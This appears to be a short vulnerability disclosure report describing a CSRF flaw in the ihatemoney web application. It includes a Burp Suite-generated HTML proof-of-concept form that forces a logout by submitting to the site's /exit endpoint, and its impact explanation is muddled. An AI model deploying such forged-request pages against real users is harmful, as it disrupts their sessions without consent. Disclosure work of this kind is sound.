Cross-Site Request Forgery (CSRF) in spiral-project/ihatemoney
May 15th 2022
Summary: Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. ... If the victim is an administrative account, CSRF can compromise the entire web application.
Steps To Reproduce: 1.Create a CSRF logout POC using the following code. Code That i use:-- <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://ihatemoney.org/exit"> <input type="submit" value="Submit request" /> </form> </body> </html>
This vulnerability is capable of CSRF. Logout any victim into the attacker account, send the HTML made by attacker and then logout him from the Session. The hacker selected the Cross-Site Request Forgery (CSRF) weakness.